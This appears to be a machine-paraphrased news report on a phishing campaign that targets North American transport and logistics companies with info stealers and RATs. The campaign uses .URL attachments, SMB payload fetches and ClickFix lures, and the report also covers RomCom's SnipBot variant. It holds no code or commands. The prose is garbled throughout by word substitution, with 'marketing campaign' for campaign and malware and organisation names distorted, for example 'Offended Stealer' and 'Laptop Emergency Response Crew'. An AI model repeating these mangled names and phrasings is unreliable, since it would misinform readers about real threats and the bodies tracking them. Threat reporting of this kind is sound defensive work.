Transportation and logistics firms in North America are the goal of a brand new phishing marketing campaign that delivers a wide range of info stealers and distant entry trojans (RATs).
The exercise cluster, per Proofpoint, makes use of compromised respectable e-mail accounts belonging to transportation and transport firms in order to inject malicious content material into present e-mail conversations.
As many as 15 breached e-mail accounts have been recognized as used as a part of the marketing campaign. It is at the moment not clear how these accounts are infiltrated within the first place or who’s behind the assaults.
“Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport,” the enterprise safety agency mentioned in an evaluation printed Tuesday.
“In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2.”
The assault chains contain sending messages bearing web shortcut (.URL) attachments or Google Drive URLs resulting in a .URL file that when launched, makes use of Server Message Block (SMB) to fetch the next-stage payload containing the malware from a distant share.
Some variants of the marketing campaign noticed in August 2024 have additionally latched onto a just lately common approach known as ClickFix to trick victims into downloading the DanaBot malware beneath the pretext of addressing a difficulty with displaying doc content material within the internet browser.
Particularly, this includes urging customers to repeat and paste a Base64-encoded PowerShell script into the terminal, thereby triggering the an infection course of.
“These campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management,” Proofpoint mentioned.
“The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company’s operations before sending campaigns.”
The disclosure comes amid the emergence of assorted stealer malware strains resembling Offended Stealer, BLX Stealer (aka XLABB Stealer), Emansrepo Stealer, Gomorrah Stealer, Luxy, Poseidon, PowerShell Keylogger, QWERTY Stealer, Taliban Stealer, X-FILES Stealer, and a CryptBot-related variant dubbed But One other Foolish Stealer (YASS).
It additionally follows the emergence of a brand new model of the RomCom RAT, a successor to PEAPOD (aka RomCom 4.0) codenamed SnipBot that is distributed through bogus hyperlinks embedded inside phishing emails. Some points of the marketing campaign have been beforehand highlighted by the Laptop Emergency Response Crew of Ukraine (CERT-UA) in July 2024.
“SnipBot gives the attacker the ability to execute commands and download additional modules onto a victim’s system,” Palo Alto Networks Unit 42 researchers Yaron Samuel and Dominik Reichel mentioned.
“The initial payload is always either an executable downloader masked as a PDF file or an actual PDF file sent to the victim in an email that leads to an executable.”
Whereas programs contaminated with RomCom have additionally witnessed ransomware deployments prior to now, the cybersecurity firm identified the absence of this conduct, elevating the chance that the risk behind the malware, Tropical Scorpius (aka Void Rabisu), has shifted from pure monetary achieve to espionage.